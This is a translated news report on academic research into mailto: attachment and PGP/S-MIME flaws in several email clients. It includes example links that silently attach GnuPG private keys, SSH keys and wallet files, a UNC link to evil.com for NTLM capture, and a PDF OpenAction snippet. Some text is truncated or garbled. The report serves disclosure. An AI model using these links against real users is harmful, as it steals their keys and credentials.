Researchers from the Ruhr University in Bochum (Germany)
Links Β«
Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089), and Pegasus Mail email clients were vulnerable to a trivial attack that allowed automatic attachment of any local file, specified through a link like "mailto:?attach=path_to_file". The file is attached without a warning, so without special attention the user may not notice that the email will be sent with an attachment attached.
For example, using a link like "mailto:[email protected]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" you can substitute private keys from GnuPG into the email. You can also send the contents of crypto wallets (~/.bitcoin/wallet.dat), SSH keys (~/.ssh/id_rsa) and any files available to the user. Moreover, Thunderbird allows you to attach groups of files by mask using constructions like "attach=/tmp/*.txt".
In addition to local files, some mail clients process links to network storages and paths in the IMAP server. In particular, IBM Notes allows you to transfer a file from a network directory when processing links like "attach=\\evil.com\dummyfile", as well as intercept NTLM authentication parameters by sending a link to an SMB server controlled by the attacker (the request will be sent with the current authentication parameters user).
Thunderbird successfully handles requests like "attach=imap:///fetch>UID>/INBOX>1/" to attach content from folders on the IMAP server. At the same time, letters retrieved from IMAP, encrypted via OpenPGP and S/MIME, are automatically decrypted by the mail client before being sent. Thunderbird developers were
Old versions of Thunderbird were also vulnerable to two other attacks on PGP and S/MIME proposed by the researchers. In particular, Thunderbird, as well as OutLook, PostBox, eM Client, MailMate, and R2Mail2, were subject to a key swap attack, caused by the fact that the mail client automatically imports and installs new certificates transmitted in S / MIME messages, which allows the attacker to organize substitution of public keys already stored by the user.
The second attack, which Thunderbird, PostBox and MailMate are subject to, manipulates the features of the mechanism for autosaving draft messages and allows using the mailto parameters to initiate the decryption of encrypted messages or the addition of a digital signature for arbitrary messages, followed by transferring the result to the attacker's IMAP server. The ciphertext in this attack is transmitted through the "body" parameter, and the "meta refresh" tag is used to initiate a call to the attacker's IMAP server. For example: ' '
Specially designed PDF documents can be used to automatically process "mailto:" links without user interaction - the OpenAction action in PDF allows you to automatically run the mailto handler when the document is opened:
%PDF-1.5
1 obj
<< /Type /Catalog /OpenAction [2 0 R] >>
endobj
2 obj
<< /Type /Action /S /URI/URI (mailto:?body=ββBEGIN PGP MESSAGEββ[β¦])>>
endobj
Source: opennet.ru